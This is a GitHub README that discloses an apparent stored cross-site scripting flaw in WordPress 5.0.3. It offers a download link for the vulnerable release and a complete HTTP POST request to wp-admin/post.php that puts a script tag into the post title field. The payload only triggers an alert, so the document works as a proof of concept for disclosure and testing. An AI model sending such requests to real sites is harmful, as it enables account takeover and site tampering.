To exploit vulnerability, Allows it to run a Stored Cross-Site Scripting by saving a new title or rename
Branch: master
Clone or download
Latest commit ee2dd34 Feb 9, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md Update README.md Feb 9, 2019
wordpress-5.0.3.tar.gz Add files via upload Feb 9, 2019
wordpress-5.0.3.zip Add files via upload Feb 9, 2019

README.md

WordPress 5.0.3 Stored Cross-Site Scripting

WordPress 5.0.3 Stored Cross-Site Scripting Vulnerability

Proof of Concept

To exploit vulnerability, Allows it to run a Stored Cross-Site Scripting by saving a new title or rename

Vulnerable Software

Vulnerable Software --> [ https://github.com/rdincel1/WordPress-5.0.3-Stored-Cross-Site-Scripting-Vulnerability/raw/master/wordpress-5.0.3.zip ]

POST http://localhost/wordpress-5.0.3/wordpress/wp-admin/post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:  http://localhost/wordpress-5.0.3/wordpress/wp-admin/post-new.php?wp-post-new-reload=true
Content-Type: application/x-www-form-urlencoded
Content-Length: 1924
Connection: close
Cookie: XXXXXXXXXXXXXXXXXXXXXXXX

_wpnonce=2e1618e21d&_wp_http_referer=/wp-admin/post-new.php&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=post&original_post_status=auto-draft&referredby=http://localhost/wordpress-5.0.3/wordpress/wp-admin/edit.php&_wp_original_http_referer=http://localhost/wordpress-5.0.3/wordpress/wp-admin/edit.php&auto_draft=&post_ID=563&meta-box-order-nonce=fb88e0133c&closedpostboxesnonce=b0682c0840&post_title=<script>alert("XSS")</script>&samplepermalinknonce=c52f311a11&_elementor_edit_mode_nonce=e4caa3d3b2&_wp_http_referer=/wp-admin/post-new.php&_elementor_post_mode=&content=&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&jj=09&mm=02&aa=2019&hh=19&mn=51&ss=02&hidden_mm=02&cur_mm=02&hidden_jj=09&cur_jj=09&hidden_aa=2019&cur_aa=2019&hidden_hh=19&cur_hh=19&hidden_mn=51&cur_mn=51&original_publish=Yayımla&publish=Yayımla&post_category[]=0&newcategory=Yeni kategori ismi&newcategory_parent=-1&_ajax_nonce-add-category=723b9109b4&tax_input[post_tag]=&newtag[post_tag]=&_thumbnail_id=-1&wordpress-https=3c6203c4d8&_wp_http_referer=/wp-admin/post-new.php&page_template=default&aiosp_edit=aiosp_edit&nonce-aioseop-edit=c697d839e3&aiosp_title=&length1=22&aiosp_description=&length2=0&excerpt=&trackback_url=&metakeyselect=#NONE#&metakeyinput=&metavalue=&_ajax_nonce-add-meta=61c1b838c1&advanced_view=1&comment_status=open&post_name=&post_author_override=1&_the_champ_meta[linkedin_horizontal_count]=&_the_champ_meta[twitter_horizontal_count]=&_the_champ_meta[facebook_horizontal_count]=&_the_champ_meta[reddit_horizontal_count]=&_the_champ_meta[linkedin_vertical_count]=&_the_champ_meta[twitter_vertical_count]=&_the_champ_meta[facebook_vertical_count]=&_the_champ_meta[reddit_vertical_count]=&the_champ_meta_nonce=c163f87048

Proof of Concept (Video)

PoC_Video

Screenshots

PoC_1 PoC_2 PoC_3